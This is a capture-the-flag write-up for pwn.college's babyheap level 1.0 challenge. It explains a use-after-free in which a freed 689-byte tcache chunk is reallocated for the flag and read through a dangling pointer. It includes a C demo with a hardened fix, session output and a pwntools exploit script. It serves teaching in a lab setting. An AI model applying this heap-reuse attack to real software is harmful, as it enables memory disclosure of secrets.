[pwn.college] DAM Level 1.0 Write up


hacker@dynamic-allocator-misuse-level-1-0:~$ /challenge/babyheap_level1.0 
###
### Welcome to /challenge/babyheap_level1.0!
###

This challenge allows you to perform various heap operations, some of which may involve the flag. Through this series of
challenges, you will become familiar with the concept of heap exploitation.

This challenge can manage up to 1 unique allocations.


[*] Function (malloc/free/puts/read_flag/quit):

There are five functions in total: malloc, free, puts, read_flag and quit. Let's look at each one.

malloc


[*] Function (malloc/free/puts/read_flag/quit): malloc

Size: 100

[*] allocations[0] = malloc(100)
[*] allocations[0] = 0x55788429d2c0

It reads a size and allocates that many bytes with malloc, storing the pointer in allocations[0].

free

Frees the chunk that was allocated with malloc. Note in the later run that the pointer in allocations[0] is not cleared afterwards: puts still works on it.

puts

[*] Function (malloc/free/puts/read_flag/quit): puts

[*] puts(allocations[0])
Data:

Prints the contents of the chunk stored in allocations[0] with puts.

read_flag

[*] Function (malloc/free/puts/read_flag/quit): read_flag

[*] flag_buffer = malloc(689)
[*] flag_buffer = 0x55d7abe922c0
[*] read the flag!

It allocates a chunk of size 689 and reads the flag into that chunk. Notice that this allocation is made through a separate flag_buffer pointer, not through allocations[0].

Since read_flag requests exactly 689 bytes, the plan is: malloc(689) and then free it, so the chunk goes into the tcache bin for that size; read_flag's malloc(689) then gets the same chunk back and the flag is written into it; allocations[0] still points at that chunk (a dangling pointer, since free does not null it), so puts(allocations[0]) prints the flag. This is a plain use-after-free read. Trying it interactively printed the flag as expected.
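To make the mechanism concrete outside the challenge binary, here is an added example (my own code, not the challenge's source) that models the same four steps in a standalone C program. The flag string and the variable names are constructed stand-ins; the real flag is only readable by the challenge. It shows both the vulnerable flow, where the stale pointer aliases the new allocation, and the one-line fix of nulling the pointer after free. Because tcache bins are keyed by chunk size, any request that rounds to the same 0x2c0 chunk as malloc(689) would work equally well.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size read_flag requests in the challenge. 689 + 8 rounds to a 0x2c0 chunk,
 * which matches the ...2c0 addresses seen in the challenge output. */
#define FLAG_SIZE 689

/* Constructed stand-in for the flag (not the real one). */
static const char FAKE_FLAG[] = "pwn.college{constructed_example_flag}";

/* Vulnerable flow, mirroring malloc -> free -> read_flag -> puts.
 * Returns 1 if the dangling allocations0 pointer aliases flag_buffer and the
 * flag can be read through it, 0 otherwise. Assumes glibc's tcache, which
 * hands a freed chunk straight back to the next same-sized request. */
int dangling_pointer_reads_flag(void) {
    char *allocations0 = malloc(FLAG_SIZE);      /* menu item "malloc" */
    if (!allocations0) return 0;
    memset(allocations0, 'A', FLAG_SIZE);

    free(allocations0);                          /* menu item "free": pointer kept */

    char *flag_buffer = malloc(FLAG_SIZE);       /* menu item "read_flag" */
    if (!flag_buffer) return 0;
    memcpy(flag_buffer, FAKE_FLAG, sizeof FAKE_FLAG);

    /* menu item "puts(allocations[0])": reads through the stale pointer */
    int aliased = (flag_buffer == allocations0) &&
                  strcmp(allocations0, FAKE_FLAG) == 0;

    free(flag_buffer);
    return aliased;
}

/* Hardened flow: clear the pointer after free so the stale read is impossible.
 * Returns 1 when the old handle can no longer be used after free. */
int hardened_read_is_blocked(void) {
    char *allocations0 = malloc(FLAG_SIZE);
    if (!allocations0) return 0;
    memset(allocations0, 'A', FLAG_SIZE);

    free(allocations0);
    allocations0 = NULL;                         /* the fix: no dangling pointer */

    char *flag_buffer = malloc(FLAG_SIZE);       /* may still reuse the chunk... */
    if (!flag_buffer) return 0;
    memcpy(flag_buffer, FAKE_FLAG, sizeof FAKE_FLAG);

    /* ...but a "puts(allocations[0])" would now have to check for NULL first */
    int blocked = (allocations0 == NULL);

    free(flag_buffer);
    return blocked;
}

int main(void) {
    printf("dangling pointer reads flag: %d\n", dangling_pointer_reads_flag());
    printf("hardened read blocked:       %d\n", hardened_read_is_blocked());
    return 0;
}
```

Build with `gcc -o uaf_demo uaf_demo.c` on a glibc system; the first line prints 1 because the freed 0x2c0 chunk is served again from the tcache. Nulling the pointer stops the read in this program, but it only closes the bug for one handle; a real fix also has to make sure no other copy of the pointer survives the free.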

hacker@dynamic-allocator-misuse-level-1-0:~$ /challenge/babyheap_level1.0 
###
### Welcome to /challenge/babyheap_level1.0!
###

This challenge allows you to perform various heap operations, some of which may involve the flag. Through this series of
challenges, you will become familiar with the concept of heap exploitation.

This challenge can manage up to 1 unique allocations.


[*] Function (malloc/free/puts/read_flag/quit): malloc

Size: 689

[*] allocations[0] = malloc(689)
[*] allocations[0] = 0x563da93382c0

[*] Function (malloc/free/puts/read_flag/quit): free

[*] free(allocations[0])


[*] Function (malloc/free/puts/read_flag/quit): read_flag

[*] flag_buffer = malloc(689)
[*] flag_buffer = 0x563da93382c0
[*] read the flag!

[*] Function (malloc/free/puts/read_flag/quit): puts

[*] puts(allocations[0])
Data: pwn.college{-----flag-----}

The same sequence scripted with pwntools also prints the flag.

from pwn import *

p = process("/challenge/babyheap_level1.0")

# 1. malloc(689): same size as the flag buffer, so it lands in the same tcache bin
p.sendlineafter(b'):', b'malloc')
p.sendlineafter(b'Size:', b'689')

# 2. free(allocations[0]): chunk goes into the tcache, pointer stays dangling
p.sendlineafter(b'):', b'free')

# 3. read_flag: flag_buffer = malloc(689) gets the freed chunk back
p.sendlineafter(b'):', b'read_flag')

# 4. puts(allocations[0]): read the flag through the stale pointer
p.sendlineafter(b'):', b'puts')

p.recvuntil(b'Data: ')

# strip the trailing newline and print the flag
print(p.recvline()[:-1])

hacker@dynamic-allocator-misuse-level-1-0:~$ python ex_code/DAM/1.py 
[+] Starting local process '/challenge/babyheap_level1.0': pid 4355
b'pwn.college{-----flag-----}'
[*] Stopped process '/challenge/babyheap_level1.0' (pid 4355)